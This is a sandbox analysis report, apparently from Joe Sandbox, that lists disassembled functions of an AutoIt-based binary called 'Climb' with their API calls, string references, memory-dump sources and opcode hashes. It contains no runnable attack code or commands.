Opcode ID: 0a632478e5f2845cb8dcdb203b4660a92d3cefad430c22ca9d8e84256a4a09cd
Instruction ID: a93fd44024c45764d5aadd69ed656ac122b20af9929bc31bd437d886791d241b
Opcode Fuzzy Hash: 0a632478e5f2845cb8dcdb203b4660a92d3cefad430c22ca9d8e84256a4a09cd
Instruction Fuzzy Hash: 5631A076201214BFEF254F50DC89FEB3BADEF4A715F044065FE089A1A1C6B59C81C7A0

Function 00135A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00135A64
NULL Pointer assignment, xrefs: 00135A8B, 00135DE0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: a74bf6ff2d2f47b56b36e7f52f3fd1b474eb0eb5b2b77be58d24c97e91cb4c0c
Instruction ID: 86537f634af1204154eabbad92097e4adff1a6d66adcf9c26a591bf2e3330dba
Opcode Fuzzy Hash: a74bf6ff2d2f47b56b36e7f52f3fd1b474eb0eb5b2b77be58d24c97e91cb4c0c
Instruction Fuzzy Hash: 89D1C175A0070A9FDF14CFA8C885AAEB7B6FF48704F148069E915AB291E770DD81CB60

Function 000F18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000F194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F19D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000F1B7B,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F1A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F1A7B

Part of subcall function 000E3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F1AF7
__freea.LIBCMT ref: 000F1B22
__freea.LIBCMT ref: 000F1B2E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 83101f5cae851559d60f15b7ea8a0a531ad6c715e617c32f916184aec7de28ed
Instruction ID: 738fe9423b0f47e2adf6a461e770bed90d02842992bbf461a715deb9aef141b6
Opcode Fuzzy Hash: 83101f5cae851559d60f15b7ea8a0a531ad6c715e617c32f916184aec7de28ed
Instruction Fuzzy Hash: 9391F472E0424EEADF218E64C891AFE7BF5AF09310F180119EA15E7541EB75CC41E7A0

Function 00134F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001350A5
VariantInit.OLEAUT32(?), ref: 001351A6
VariantClear.OLEAUT32(?), ref: 001351B0
VariantClear.OLEAUT32(?), ref: 0013520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00135189
Null Object assignment in FOR..IN loop, xrefs: 00135035, 00135163, 0013521B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: cf0d9590d0abdf631281cb1b341308cb9a47289fe46dbaca3295e99c2de586ea
Instruction ID: fc5a087a391cef4584e8b65a44aa1b071e096aaaf710f5e49f69276e3a2dc1b5
Opcode Fuzzy Hash: cf0d9590d0abdf631281cb1b341308cb9a47289fe46dbaca3295e99c2de586ea
Instruction Fuzzy Hash: 49918B71A00619EBDF24CFA4C888FAFBBB9AF45B14F148519F515AB280D7709945CFA0

Function 00121B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00121C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00121C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121DEF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 9267186e13a0098d06ca60b826f57530dbd0f4394c83a6c2728724468eb3a672
Instruction ID: 28ca15fcf34f2db17220913679b09cd6f79abcf2d392b0494550367a07b02a38
Opcode Fuzzy Hash: 9267186e13a0098d06ca60b826f57530dbd0f4394c83a6c2728724468eb3a672
Instruction Fuzzy Hash: 84910379A00229BFDB01DF94E884BFEB7B4FF65711F154029E900EB2A1D774A961CB90

Function 001343A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001343C8
CharUpperBuffW.USER32(?,?), ref: 001344D7
_wcslen.LIBCMT ref: 001344E7
VariantClear.OLEAUT32(?), ref: 0013467C

Part of subcall function 0012169E: VariantInit.OLEAUT32(00000000), ref: 001216DE
Part of subcall function 0012169E: VariantCopy.OLEAUT32(?,?), ref: 001216E7
Part of subcall function 0012169E: VariantClear.OLEAUT32(?), ref: 001216F3

Strings

Incorrect Parameter format, xrefs: 00134403, 001345FE
AUTOIT.ERROR, xrefs: 001344DD, 001344E2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: b99d7b90f9f5f1bac53d13866a3b0a255809a6f3b3c4f75a7dddb83e8c7f4813
Instruction ID: fe9584b0f33902dfc0bbc910519054401af395fcdc86fdcdb6334d03f8fd746a
Opcode Fuzzy Hash: b99d7b90f9f5f1bac53d13866a3b0a255809a6f3b3c4f75a7dddb83e8c7f4813
Instruction Fuzzy Hash: EB915975A083019FC704DF24C4819AABBE5FF89714F14892DF89A9B352DB31ED46CB92

Function 0013560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 001108FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?,?,00110C4E), ref: 0011091B
Part of subcall function 001108FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110936
Part of subcall function 001108FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110944
Part of subcall function 001108FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?), ref: 00110954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001356AE
_wcslen.LIBCMT ref: 001357B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0013582C
CoTaskMemFree.OLE32(?), ref: 00135837

Strings

NULL Pointer assignment, xrefs: 00135880, 001358AF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 4d97681e0f558f7edfbc6c8c10e54ad7ab6678237dfc413a9b4d49f018a9287b
Instruction ID: 8208fda655a068891dd7fb24d3c039872af316f7fc261ac7fcb6dde043324eac
Opcode Fuzzy Hash: 4d97681e0f558f7edfbc6c8c10e54ad7ab6678237dfc413a9b4d49f018a9287b
Instruction Fuzzy Hash: F3910571D00219EFDF14DFA4D881AEEBBB9BF08714F10456AE915AB251EB709A44CFA0

Function 00142B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00142C1F
GetMenuItemCount.USER32(00000000), ref: 00142C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00142C79
_wcslen.LIBCMT ref: 00142CAF
GetMenuItemID.USER32(?,?), ref: 00142CE9
GetSubMenu.USER32(?,?), ref: 00142CF7

Part of subcall function 00114393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001143AD
Part of subcall function 00114393: GetCurrentThreadId.KERNEL32 ref: 001143B4
Part of subcall function 00114393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00112F00), ref: 001143BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00142D7F

Part of subcall function 0011F292: Sleep.KERNEL32 ref: 0011F30A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 5ab02f59afd3817a5532910e57ae94e14336537ffadfad1513ed361be8ba307b
Instruction ID: bb28c19d1bffb54e580d8e9cd6503282c96c93903b595c5c8f9fa911497f553c
Opcode Fuzzy Hash: 5ab02f59afd3817a5532910e57ae94e14336537ffadfad1513ed361be8ba307b
Instruction Fuzzy Hash: AD717D75E00215AFCB14DFA4C885AEEB7B5EF48310F558469F816EB361DB34AD81CB90

Function 001488F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00148992
IsWindowEnabled.USER32(00000000), ref: 0014899E
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00148A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00148AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00148AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00148B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00148B1E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 02fd21d14e9bcb0125826aa048cacbbf3510ec491305d33e1d2feaf52490d880
Instruction ID: 23eb020ed78ccfbe6c8bab42702cfc8c6ff98a1a0c649b335fb98e5ad1eb0375
Opcode Fuzzy Hash: 02fd21d14e9bcb0125826aa048cacbbf3510ec491305d33e1d2feaf52490d880
Instruction Fuzzy Hash: D971AE74600605AFEF25DF54C884FBEBBB5FF49304F24046AE855A7271CB71A980DB61

Function 0011B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0011B8C0
GetKeyboardState.USER32(?), ref: 0011B8D5
SetKeyboardState.USER32(?), ref: 0011B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 0011B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 0011B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 0011B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0011B9E7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8259e24e9754054368c32fb7b2593cb06da51a5b2109b6690ca8e88babeafc74
Instruction ID: ce81d6ffacd49245fc84dbe0585f0764f9bc3a081bf7b045db4dc89e7510bd79
Opcode Fuzzy Hash: 8259e24e9754054368c32fb7b2593cb06da51a5b2109b6690ca8e88babeafc74
Instruction Fuzzy Hash: 7C51D3A050C7D93EFB3A42388C95BFA7EA95F06708F0884A9E1D5468D2C3E8ADC5D750

Function 0011B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0011B6E0
GetKeyboardState.USER32(?), ref: 0011B6F5
SetKeyboardState.USER32(?), ref: 0011B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0011B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0011B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0011B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0011B7FF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2e519ef3a008dc7378e031ac764efd15e6b61368989381367a4c1e9b8f58002d
Instruction ID: e0609b871edb064ec59660817449f185cd6a9c3b0c08d72650f5138f361e74e5
Opcode Fuzzy Hash: 2e519ef3a008dc7378e031ac764efd15e6b61368989381367a4c1e9b8f58002d
Instruction Fuzzy Hash: 0851C0A090C7D53EFB3A83248C95BFABEA95B46704F0884A9E1D94A8D2D394ECD4D750

Function 000E57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,000E5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 000E57E3
__fassign.LIBCMT ref: 000E585E
__fassign.LIBCMT ref: 000E5879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 000E589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,000E5F16,00000000,?,?,?,?,?,?,?,?,?,000E5F16,?), ref: 000E58BE
WriteFile.KERNEL32(?,?,00000001,000E5F16,00000000,?,?,?,?,?,?,?,?,?,000E5F16,?), ref: 000E58F7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1ea91d00cd86a46f078752957ee45cd1096c9160b7e45cd5d6de7d3ba2d8c022
Instruction ID: eb4bb06425943b07696f64e7f248d082864ce626f3ca5f4f7cf7727b6dbc4c2c
Opcode Fuzzy Hash: 1ea91d00cd86a46f078752957ee45cd1096c9160b7e45cd5d6de7d3ba2d8c022
Instruction Fuzzy Hash: D251C171A00689EFCB10CFA9DC85AEEBBF8EF09311F14451AE955F7292D7309A41CB61

Function 000D3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 000D30BB
___except_validate_context_record.LIBVCRUNTIME ref: 000D30C3
_ValidateLocalCookies.LIBCMT ref: 000D3151
__IsNonwritableInCurrentImage.LIBCMT ref: 000D317C
_ValidateLocalCookies.LIBCMT ref: 000D31D1

Strings

csm, xrefs: 000D3166

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b51aa02361e2dd528e534edabbc40fff9a1deeced889d01a16b16b241459516b
Instruction ID: 76027259f9604e36cc2ef22ad1f81d8acfb8e95340f27d3397fca2dcdc17f29b
Opcode Fuzzy Hash: b51aa02361e2dd528e534edabbc40fff9a1deeced889d01a16b16b241459516b
Instruction Fuzzy Hash: 3D41B638E00309ABCF10DF68C895AEEBBF5AF45314F148156E8156B392D771DB45CBA2

Function 00131B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00133AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00133AD7
Part of subcall function 00133AAB: _wcslen.LIBCMT ref: 00133AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00131B6F
WSAGetLastError.WSOCK32 ref: 00131B7E
WSAGetLastError.WSOCK32 ref: 00131C26
closesocket.WSOCK32(00000000), ref: 00131C56

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 4688b8c601d734327249c0a561c9aef04bdab8290e4f1a3c138cb06532c1fb5e
Instruction ID: d73c47080440d9fc9f45af17f93fa19209b47c88f475408a484f67109e1bb9d7
Opcode Fuzzy Hash: 4688b8c601d734327249c0a561c9aef04bdab8290e4f1a3c138cb06532c1fb5e
Instruction Fuzzy Hash: B541E635600114AFDB109F24D885BF9BBE9EF45364F148069FC19AB292DB74ED81CBE1

Function 0011D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0011D7CD,?), ref: 0011E714

Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0011D7CD,?), ref: 0011E72D

lstrcmpiW.KERNEL32(?,?), ref: 0011D7F0
MoveFileW.KERNEL32(?,?), ref: 0011D82A
_wcslen.LIBCMT ref: 0011D8B0
_wcslen.LIBCMT ref: 0011D8C6
SHFileOperationW.SHELL32(?), ref: 0011D90C

Strings

\*.*, xrefs: 0011D89E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 56781a7477aceecbee4c66edbe0b32b36de1cf02e591dab40ce8c3643d940a4a
Instruction ID: 4838b9924fd334896313d291c34dae994514c7e66a580a2803e7214bc60b93a1
Opcode Fuzzy Hash: 56781a7477aceecbee4c66edbe0b32b36de1cf02e591dab40ce8c3643d940a4a
Instruction Fuzzy Hash: 454160719452189FDF16EBA4E981ADE73F8AF19340F4004FAE509EB142EB34A7C8CB10

Function 00143899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001438B8
GetWindowLongW.USER32(00000000,000000F0), ref: 001438EB
GetWindowLongW.USER32(00000000,000000F0), ref: 00143920
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00143952
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0014397C
GetWindowLongW.USER32(00000000,000000F0), ref: 0014398D
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001439A7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d089884e9c6f921ff61e9def20e4d826ad7c65c40a984fe1c97021cd93e4346c
Instruction ID: 3a5feb187349234ca6b0509e940270f7e2c7d4ed25b0fdf36d97875f80d255f0
Opcode Fuzzy Hash: d089884e9c6f921ff61e9def20e4d826ad7c65c40a984fe1c97021cd93e4346c
Instruction Fuzzy Hash: 44313934704255AFDB21CF48EC95F6437E1FB8A718F151164F5208B6B1CBB1AE85DB01

Function 0011808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

